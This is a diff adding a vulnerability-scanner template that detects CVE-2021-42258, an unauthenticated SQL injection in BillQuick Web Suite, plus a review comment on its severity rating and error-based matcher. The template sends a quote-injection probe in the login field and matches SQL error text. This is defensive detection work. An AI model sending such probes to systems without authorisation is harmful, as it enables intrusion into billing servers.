diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
new file mode 100644
index 0000000000..64def1d504
--- /dev/null
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -0,0 +1,64 @@
+id: CVE-2021-42258
+
+info:
+  name: BillQuick Web Suite SQLi
+  author: dwisiswant0
+  severity: high
+  tags: cve,cve2021,sqli,billquick
+  description: |
+    BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
+    allows SQL injection for unauthenticated remote code execution,
+    as exploited in the wild in October 2021 for ransomware installation.
+    SQL injection can, for example, use the txtID (aka username) parameter.
+    Successful exploitation can include the ability to execute
+    arbitrary code as MSSQLSERVER$ via xp_cmdshell.
+  reference:
+    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{BaseURL}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
+
+    cookie-reuse: true
+    extractors:
+      - type: xpath
+        name: VS
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__VIEWSTATE']"
+
+      - type: xpath
+        name: VSG
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
+
+      - type: xpath
+        name: EV
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
+
+    matchers:
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "System.Data.SqlClient.SqlException"
+          - "Incorrect syntax near"
+          - "_ACCOUNTLOCKED"
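Review bot: `severity: high` in the info block understates the issue the description itself gives (unauthenticated SQL injection leading to remote code execution, exploited in the wild); NVD rates this CVE critical (CVSS 3.1 9.8), so it should read `severity: critical`, and the template should carry the usual `classification` block (`cvss-score`, `cwe-id` for SQL injection) with the values copied from the linked NVD entry. The matcher only fires when the server echoes a raw `SqlException` / `Incorrect syntax near` message, and `condition: and` additionally requires `_ACCOUNTLOCKED`; an instance with custom error pages or a differently worded lockout message is therefore reported clean, which is worth stating in the description, e.g. `Detection is error-based and requires verbose SQL errors in the response; a hardened deployment may yield a false negative.` The purpose of the `_ACCOUNTLOCKED` token is not obvious from the template and deserves a one-line comment above the `words:` list explaining where it appears in the vulnerable response.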